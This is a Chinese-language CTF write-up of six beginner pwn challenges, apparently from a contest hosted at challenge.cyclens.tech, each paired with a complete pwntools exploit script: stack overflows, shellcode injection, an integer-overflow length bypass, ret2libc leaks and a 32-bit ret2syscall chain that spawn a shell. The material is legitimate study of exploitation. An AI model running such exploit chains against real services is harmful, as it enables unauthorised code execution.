正宗老代码,没有任何 AI 添加的内容。
lit_ret2text32
简单的栈溢出,填充0x3c字节后把返回地址覆盖为后门函数地址(0x8049213),进后门后 cat f* 即可。exp如下:
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
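# Verbose pwntools tube logging; drop to 'info' once the chain is stable.
context.log_level = 'debug'
# The target is a 32-bit binary (the payload uses p32 and the challenge is
# named ret2text32); the template had 'amd64' here, which nothing in this
# script relied on, so set the architecture to match the binary.
context.arch = 'i386'

# flag=1 -> remote instance, flag=0 -> local ./pwn for debugging.
flag = 1
if flag:
    p = remote('challenge.cyclens.tech', 30826)
else:
    p = process('./pwn')

# Short aliases over the tube; every one closes over the module-level `p`.
sa = lambda s, n: p.sendafter(s, n)
sla = lambda s, n: p.sendlineafter(s, n)
sl = lambda s: p.sendline(s)
slr = lambda s: p.sendline(str(s))
sd = lambda s: p.send(s)
sdr = lambda s: p.send(str(s))
rc = lambda n: p.recv(n)
ru = lambda s: p.recvuntil(s)
ti = lambda: p.interactive()
rcl = lambda: p.recvline()
# Log a leaked address as "NAME--->0x...".
leak = lambda name, addr: log.success(name + "--->" + hex(addr))
# Read `a` raw bytes of a little-endian pointer and zero-extend to 8 bytes.
# The template also called .strip() on the padded buffer; bytes.strip()
# removes ASCII whitespace (0x09-0x0d, 0x20), not NULs, so a leading address
# byte that happened to be whitespace would have been eaten and u64() would
# then fail on a short buffer.  Padding alone is what is intended.
u6 = lambda a: u64(rc(a).ljust(8, b'\x00'))
# Parse a hex string such as "0x7ffd..." (int() accepts bytes as well).
i6 = lambda a: int(a, 16)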
def csu():
    """Return three little-endian qwords (0, 0, 1).

    Leftover template helper -- presumably a ret2csu register-setup
    fragment; nothing in this script calls it.
    """
    words = (0, 0, 1)
    return b''.join(p64(w) for w in words)
def ph(s):
    """Print the integer *s* as 0x-prefixed lowercase hex (leak debugging)."""
    print(format(s, '#x'))
def dbg():
    """Attach gdb to the live target, then block until the user resumes."""
    # For a split tmux pane: context.terminal = ['tmux', 'splitw', '-h']
    # A gdbscript such as 'set debug-file-directory ./star' can be passed to attach().
    tube = p
    gdb.attach(tube)
    pause()
# ret2text: 0x3c bytes of filler reach the saved return address, which is
# overwritten with the backdoor function (0x8049213).  No prompt is awaited
# before sending.
backdoor = 0x8049213
pay = b'b' * 0x3c + p32(backdoor)
sd(pay)
ti()
lit_ret2shellcode
没开NX保护,题目直接给了栈上buf的地址:先把shellcode写到buf开头,再栈溢出(偏移0x78)把返回地址覆盖为buf地址即可。exp如下:
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
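# Verbose pwntools tube logging; drop to 'info' once the chain is stable.
context.log_level = 'debug'
context.arch = 'amd64'   # 64-bit target: shellcraft/asm and flat() depend on this

# Optional SOCKS5 proxy for the remote connection.  Fill in the proxy from
# the environment if needed; never commit real proxy credentials to a
# writeup -- the username/password originally pasted here were published
# and should be treated as exposed and rotated.  `socket` is assumed to be
# re-exported by `from pwn import *` -- TODO confirm, else `import socket`.
# socks.set_default_proxy(
#     socks.SOCKS5,
#     "<proxy-host>",
#     <proxy-port>,
#     username="<proxy-user>",
#     password="<proxy-password>",
#     rdns=True,
# )
# socket.socket = socks.socksocket

# flag=1 -> remote instance, flag=0 -> local ./pwn for debugging.
flag = 1
if flag:
    p = remote('challenge.cyclens.tech', 30496)
else:
    p = process('./pwn')

# Short aliases over the tube; every one closes over the module-level `p`.
sa = lambda s, n: p.sendafter(s, n)
sla = lambda s, n: p.sendlineafter(s, n)
sl = lambda s: p.sendline(s)
slr = lambda s: p.sendline(str(s))
sd = lambda s: p.send(s)
sdr = lambda s: p.send(str(s))
rc = lambda n: p.recv(n)
ru = lambda s: p.recvuntil(s)
ti = lambda: p.interactive()
rcl = lambda: p.recvline()
# Log a leaked address as "NAME--->0x...".
leak = lambda name, addr: log.success(name + "--->" + hex(addr))
# Read `a` raw bytes of a little-endian pointer and zero-extend to 8 bytes.
# The template also called .strip() on the padded buffer; bytes.strip()
# removes ASCII whitespace (0x09-0x0d, 0x20), not NULs, so a leading address
# byte that happened to be whitespace would have been eaten and u64() would
# then fail on a short buffer.  Padding alone is what is intended.
u6 = lambda a: u64(rc(a).ljust(8, b'\x00'))
# Parse a hex string such as "0x7ffd..." (int() accepts bytes as well).
i6 = lambda a: int(a, 16)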
def csu():
    """Return three little-endian qwords (0, 0, 1).

    Leftover template helper -- presumably a ret2csu register-setup
    fragment; nothing in this script calls it.
    """
    words = (0, 0, 1)
    return b''.join(p64(w) for w in words)
def ph(s):
    """Print the integer *s* as 0x-prefixed lowercase hex (leak debugging)."""
    print(format(s, '#x'))
def dbg():
    """Attach gdb to the live target, then block until the user resumes."""
    # For a split tmux pane: context.terminal = ['tmux', 'splitw', '-h']
    # A gdbscript such as 'set debug-file-directory ./star' can be passed to attach().
    tube = p
    gdb.attach(tube)
    pause()
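# The binary prints the buffer address after this hint; parse the hex string.
ru(b"Here is a hint for you: buf is at ")
base = i6(rcl().strip())

# NX is off: shellcode goes at the start of the buffer and the saved return
# address, 0x78 bytes in, is pointed back at the buffer.
sc = asm(shellcraft.sh())
# ljust() never truncates: if the shellcode ever outgrew the padding the
# return address would land in the wrong slot.  Fail loudly instead.
if len(sc) > 0x78:
    raise ValueError(f"shellcode is {len(sc):#x} bytes, exceeds 0x78 of padding")
pay = sc.ljust(0x78, b'b') + p64(base)
sd(pay)
ti()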
lit_integer_overflow
第一次输入是第二次输入的长度,虽然有范围检查(0-63),但检查不通过也不退出,跟没检查一样。直接输入一个大于0x48的数即可栈溢出,把返回地址覆盖为目标函数地址(0x4011D7);注意在目标地址前先放一个ret gadget做栈对齐。exp如下:
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
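# Verbose pwntools tube logging; drop to 'info' once the chain is stable.
context.log_level = 'debug'
context.arch = 'amd64'   # 64-bit target: p64/flat() word size depends on this
elf = ELF('./pwn')

# Optional SOCKS5 proxy for the remote connection.  Fill in the proxy from
# the environment if needed; never commit real proxy credentials to a
# writeup -- the username/password originally pasted here were published
# and should be treated as exposed and rotated.  `socket` is assumed to be
# re-exported by `from pwn import *` -- TODO confirm, else `import socket`.
# socks.set_default_proxy(
#     socks.SOCKS5,
#     "<proxy-host>",
#     <proxy-port>,
#     username="<proxy-user>",
#     password="<proxy-password>",
#     rdns=True,
# )
# socket.socket = socks.socksocket

# flag=1 -> remote instance, flag=0 -> local ./pwn for debugging.
flag = 1
if flag:
    p = remote('challenge.cyclens.tech', 30088)
else:
    p = process('./pwn')

# Short aliases over the tube; every one closes over the module-level `p`.
sa = lambda s, n: p.sendafter(s, n)
sla = lambda s, n: p.sendlineafter(s, n)
sl = lambda s: p.sendline(s)
slr = lambda s: p.sendline(str(s))
sd = lambda s: p.send(s)
sdr = lambda s: p.send(str(s))
rc = lambda n: p.recv(n)
ru = lambda s: p.recvuntil(s)
ti = lambda: p.interactive()
rcl = lambda: p.recvline()
# Log a leaked address as "NAME--->0x...".
leak = lambda name, addr: log.success(name + "--->" + hex(addr))
# Read `a` raw bytes of a little-endian pointer and zero-extend to 8 bytes.
# The template also called .strip() on the padded buffer; bytes.strip()
# removes ASCII whitespace (0x09-0x0d, 0x20), not NULs, so a leading address
# byte that happened to be whitespace would have been eaten and u64() would
# then fail on a short buffer.  Padding alone is what is intended.
u6 = lambda a: u64(rc(a).ljust(8, b'\x00'))
# Parse a hex string such as "0x7ffd..." (int() accepts bytes as well).
i6 = lambda a: int(a, 16)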
def csu():
    """Return three little-endian qwords (0, 0, 1).

    Leftover template helper -- presumably a ret2csu register-setup
    fragment; nothing in this script calls it.
    """
    words = (0, 0, 1)
    return b''.join(p64(w) for w in words)
def ph(s):
    """Print the integer *s* as 0x-prefixed lowercase hex (leak debugging)."""
    print(format(s, '#x'))
def dbg():
    """Attach gdb to the live target, then block until the user resumes."""
    # For a split tmux pane: context.terminal = ['tmux', 'splitw', '-h']
    # A gdbscript such as 'set debug-file-directory ./star' can be passed to attach().
    tube = p
    gdb.attach(tube)
    pause()
# The first input is the byte count for the second read.  The (0-63) range
# check does not abort on failure, so an out-of-range count lets the second
# read overflow the 0x48-byte frame.
ru(b"How many bytes do you want to read? (0-63): ")
sl(b'2147483648')

ret = 0x4011EC   # presumably a lone `ret`: realigns rsp to 16 bytes before the target
tar = 0x4011D7   # function reached after the overflow (see writeup)
pay = b'b' * 0x48 + flat(ret, tar)
sd(pay)
ti()
lit_ropchain
普通的栈溢出,给了很多gadget,预期解应该是栈溢出调用read往bss段里写binsh再调用system,我就直接套ret2libc的模板了。libc版本是libc6_2.35-0ubuntu3.13_amd64。exp如下:
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
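# Verbose pwntools tube logging; drop to 'info' once the chain is stable.
context.log_level = 'debug'
context.arch = 'amd64'   # 64-bit target: p64/flat() word size depends on this
elf = ELF('./pwn')
libc = ELF('./libc.so.6')

# Optional SOCKS5 proxy for the remote connection.  Fill in the proxy from
# the environment if needed; never commit real proxy credentials to a
# writeup -- the username/password originally pasted here were published
# and should be treated as exposed and rotated.  `socket` is assumed to be
# re-exported by `from pwn import *` -- TODO confirm, else `import socket`.
# socks.set_default_proxy(
#     socks.SOCKS5,
#     "<proxy-host>",
#     <proxy-port>,
#     username="<proxy-user>",
#     password="<proxy-password>",
#     rdns=True,
# )
# socket.socket = socks.socksocket

# flag=1 -> remote instance, flag=0 -> local ./pwn for debugging.
flag = 1
if flag:
    p = remote('challenge.cyclens.tech', 30763)
else:
    p = process('./pwn')

# Short aliases over the tube; every one closes over the module-level `p`.
sa = lambda s, n: p.sendafter(s, n)
sla = lambda s, n: p.sendlineafter(s, n)
sl = lambda s: p.sendline(s)
slr = lambda s: p.sendline(str(s))
sd = lambda s: p.send(s)
sdr = lambda s: p.send(str(s))
rc = lambda n: p.recv(n)
ru = lambda s: p.recvuntil(s)
ti = lambda: p.interactive()
rcl = lambda: p.recvline()
# Log a leaked address as "NAME--->0x...".
leak = lambda name, addr: log.success(name + "--->" + hex(addr))
# Read `a` raw bytes of a little-endian pointer and zero-extend to 8 bytes.
# The template also called .strip() on the padded buffer; bytes.strip()
# removes ASCII whitespace (0x09-0x0d, 0x20), not NULs, so a leading address
# byte that happened to be whitespace would have been eaten and u64() would
# then fail on a short buffer.  Padding alone is what is intended.
u6 = lambda a: u64(rc(a).ljust(8, b'\x00'))
# Parse a hex string such as "0x7ffd..." (int() accepts bytes as well).
i6 = lambda a: int(a, 16)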
def csu():
    """Return three little-endian qwords (0, 0, 1).

    Leftover template helper -- presumably a ret2csu register-setup
    fragment; nothing in this script calls it.
    """
    words = (0, 0, 1)
    return b''.join(p64(w) for w in words)
def ph(s):
    """Print the integer *s* as 0x-prefixed lowercase hex (leak debugging)."""
    print(format(s, '#x'))
def dbg():
    """Attach gdb to the live target, then block until the user resumes."""
    # For a split tmux pane: context.terminal = ['tmux', 'splitw', '-h']
    # A gdbscript such as 'set debug-file-directory ./star' can be passed to attach().
    tube = p
    gdb.attach(tube)
    pause()
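ru(b"Tell me your name: ")
rdi = 0x4011b7   # pop rdi; ret -- presumably, from the binary's gadget list
ret = 0x401233   # lone ret, used to realign the stack before system()
pu = elf.sym['puts']
put = elf.got['puts']
main = elf.sym['main']

# Stage 1: puts(puts@got) leaks the resolved libc pointer, then return to main.
pay = b'b' * 0x48 + flat(rdi, put, pu, main)
sd(pay)
# puts() emits the 6 significant bytes of the pointer followed by '\n'.
# Anything the program printed before that would corrupt the leak; no echo
# is assumed here -- verify against the binary if the base looks wrong.
libcbase = u6(6) - libc.sym['puts']
ph(libcbase)
# A real libc mapping is page-aligned; catch a misparsed leak before stage 2
# instead of sending a chain built on garbage.
if libcbase & 0xfff:
    raise ValueError(f"bad libc leak: base {libcbase:#x} is not page-aligned")
sy = libcbase + libc.sym['system']
binsh = libcbase + next(libc.search(b'/bin/sh'))

# Stage 2: ret; pop rdi; "/bin/sh"; system.  The leading ret keeps rsp
# 16-byte aligned at the call, which glibc's system() requires (movaps).
pay = b'b' * 0x48 + flat(ret, rdi, binsh, sy)
sd(pay)
ti()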
lit_ret2syscall32
跟题目名字一样,32位的ret2syscall。给了控制ebx、ecx、edx的gadget和int 0x80。不过这个int 0x80后面没有ret,只能用一次,所以先栈溢出调用read往bss里写/bin/sh再返回main,然后第二次溢出用int 0x80调用execve即可getshell。exp如下:
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
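# Verbose pwntools tube logging; drop to 'info' once the chain is stable.
context.log_level = 'debug'
context.arch = 'i386'    # 32-bit target: flat() must pack 4-byte words
elf = ELF('./pwn')

# Optional SOCKS5 proxy for the remote connection.  Fill in the proxy from
# the environment if needed; never commit real proxy credentials to a
# writeup -- the username/password originally pasted here were published
# and should be treated as exposed and rotated.  `socket` is assumed to be
# re-exported by `from pwn import *` -- TODO confirm, else `import socket`.
# socks.set_default_proxy(
#     socks.SOCKS5,
#     "<proxy-host>",
#     <proxy-port>,
#     username="<proxy-user>",
#     password="<proxy-password>",
#     rdns=True,
# )
# socket.socket = socks.socksocket

# flag=1 -> remote instance, flag=0 -> local ./pwn for debugging.
flag = 1
if flag:
    p = remote('challenge.cyclens.tech', 30559)
else:
    p = process('./pwn')

# Short aliases over the tube; every one closes over the module-level `p`.
sa = lambda s, n: p.sendafter(s, n)
sla = lambda s, n: p.sendlineafter(s, n)
sl = lambda s: p.sendline(s)
slr = lambda s: p.sendline(str(s))
sd = lambda s: p.send(s)
sdr = lambda s: p.send(str(s))
rc = lambda n: p.recv(n)
ru = lambda s: p.recvuntil(s)
ti = lambda: p.interactive()
rcl = lambda: p.recvline()
# Log a leaked address as "NAME--->0x...".
leak = lambda name, addr: log.success(name + "--->" + hex(addr))
# Read `a` raw bytes of a little-endian pointer and zero-extend to 8 bytes.
# Unused in this 32-bit script (a 4-byte leak would want u32); kept from the
# template.  The template also called .strip() on the padded buffer;
# bytes.strip() removes ASCII whitespace (0x09-0x0d, 0x20), not NULs, so a
# leading whitespace address byte would have been eaten.  Padding alone is
# what is intended.
u6 = lambda a: u64(rc(a).ljust(8, b'\x00'))
# Parse a hex string such as "0x7ffd..." (int() accepts bytes as well).
i6 = lambda a: int(a, 16)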
def csu():
    """Return three little-endian qwords (0, 0, 1).

    Leftover template helper -- presumably a ret2csu register-setup
    fragment; nothing in this script calls it.
    """
    words = (0, 0, 1)
    return b''.join(p64(w) for w in words)
def ph(s):
    """Print the integer *s* as 0x-prefixed lowercase hex (leak debugging)."""
    print(format(s, '#x'))
def dbg():
    """Attach gdb to the live target, then block until the user resumes."""
    # For a split tmux pane: context.terminal = ['tmux', 'splitw', '-h']
    # A gdbscript such as 'set debug-file-directory ./star' can be passed to attach().
    tube = p
    gdb.attach(tube)
    pause()
# Gadget addresses from the binary.  Names follow the registers they load;
# judging by the payload layout, `ecb` pops ecx first and then ebx.
eax = 0x80491a6
ecb = 0x80491b0
edx = 0x80491b6
end = 0x80491c1      # int 0x80 with no ret after it: usable exactly once
tar = 0x804B3A0      # writable .bss slot that will hold "/bin/sh"
main = elf.sym['main']
read = elf.sym['read']

# Stage 1 (cdecl): overflow into read(0, tar, 0x100) and return to main.
pay = b'b' * 0x4c + flat(read, main, 0, tar, 0x100)
sd(pay)
sleep(1)             # give the chain time to reach read() before the string arrives
sd(b'/bin/sh\x00')

# Stage 2: execve(tar, NULL, NULL) via int 0x80 -- eax=0xb, ebx=tar, ecx=0, edx=0.
ru(b"Input: ")
pay = b'b' * 0x4c + flat(eax, 0xb, ecb, 0, tar, edx, 0, end)
sd(pay)
ti()
lit_ret2libc
跟那个ropchain差不多,套板子即可。栈溢出返回puts打印puts函数真实地址,进而求出libc基地址,然后通过libc基地址找到system函数与binsh字符串的真实地址。然后返回调用system("/bin/sh")即可,libc版本也是libc6_2.35-0ubuntu3.13_amd64。exp如下:
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
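# Verbose pwntools tube logging; drop to 'info' once the chain is stable.
context.log_level = 'debug'
context.arch = 'amd64'   # 64-bit target: p64/flat() word size depends on this
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
# libc1 = cdll.LoadLibrary('./libc.so.6')   # only needed when calling libc (e.g. rand) locally

# Optional SOCKS5 proxy for the remote connection.  Fill in the proxy from
# the environment if needed; never commit real proxy credentials to a
# writeup -- the username/password originally pasted here were published
# and should be treated as exposed and rotated.  `socket` is assumed to be
# re-exported by `from pwn import *` -- TODO confirm, else `import socket`.
# socks.set_default_proxy(
#     socks.SOCKS5,
#     "<proxy-host>",
#     <proxy-port>,
#     username="<proxy-user>",
#     password="<proxy-password>",
#     rdns=True,
# )
# socket.socket = socks.socksocket

# flag=1 -> remote instance, flag=0 -> local ./pwn for debugging.
flag = 1
if flag:
    p = remote('challenge.cyclens.tech', 30763)
else:
    p = process('./pwn')

# Short aliases over the tube; every one closes over the module-level `p`.
sa = lambda s, n: p.sendafter(s, n)
sla = lambda s, n: p.sendlineafter(s, n)
sl = lambda s: p.sendline(s)
slr = lambda s: p.sendline(str(s))
sd = lambda s: p.send(s)
sdr = lambda s: p.send(str(s))
rc = lambda n: p.recv(n)
ru = lambda s: p.recvuntil(s)
ti = lambda: p.interactive()
rcl = lambda: p.recvline()
# Log a leaked address as "NAME--->0x...".
leak = lambda name, addr: log.success(name + "--->" + hex(addr))
# Read `a` raw bytes of a little-endian pointer and zero-extend to 8 bytes.
# The template also called .strip() on the padded buffer; bytes.strip()
# removes ASCII whitespace (0x09-0x0d, 0x20), not NULs, so a leading address
# byte that happened to be whitespace would have been eaten and u64() would
# then fail on a short buffer.  Padding alone is what is intended.
u6 = lambda a: u64(rc(a).ljust(8, b'\x00'))
# Parse a hex string such as "0x7ffd..." (int() accepts bytes as well).
i6 = lambda a: int(a, 16)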
def csu():
    """Return three little-endian qwords (0, 0, 1).

    Leftover template helper -- presumably a ret2csu register-setup
    fragment; nothing in this script calls it.
    """
    words = (0, 0, 1)
    return b''.join(p64(w) for w in words)
def ph(s):
    """Print the integer *s* as 0x-prefixed lowercase hex (leak debugging)."""
    print(format(s, '#x'))
def dbg():
    """Attach gdb to the live target, then block until the user resumes."""
    # For a split tmux pane: context.terminal = ['tmux', 'splitw', '-h']
    # A gdbscript such as 'set debug-file-directory ./star' can be passed to attach().
    tube = p
    gdb.attach(tube)
    pause()
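ru(b"Tell me your name: ")
rdi = 0x4011b7   # pop rdi; ret -- presumably, from the binary's gadget list
ret = 0x401233   # lone ret, used to realign the stack before system()
pu = elf.sym['puts']
put = elf.got['puts']
main = elf.sym['main']

# Stage 1: puts(puts@got) leaks the resolved libc pointer, then return to main.
pay = b'b' * 0x48 + flat(rdi, put, pu, main)
sd(pay)
# puts() emits the 6 significant bytes of the pointer followed by '\n'.
# Anything the program printed before that would corrupt the leak; no echo
# is assumed here -- verify against the binary if the base looks wrong.
libcbase = u6(6) - libc.sym['puts']
ph(libcbase)
# A real libc mapping is page-aligned; catch a misparsed leak before stage 2
# instead of sending a chain built on garbage.
if libcbase & 0xfff:
    raise ValueError(f"bad libc leak: base {libcbase:#x} is not page-aligned")
sy = libcbase + libc.sym['system']
binsh = libcbase + next(libc.search(b'/bin/sh'))

# Stage 2: ret; pop rdi; "/bin/sh"; system.  The leading ret keeps rsp
# 16-byte aligned at the call, which glibc's system() requires (movaps).
pay = b'b' * 0x48 + flat(ret, rdi, binsh, sy)
sd(pay)
ti()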
总结
这个比赛还是很简单的,被虐了这么久突然写这么简单的反而不太适应了,exp写的比较慢。不过感觉也差不多,肯定也没ai写exp写的快。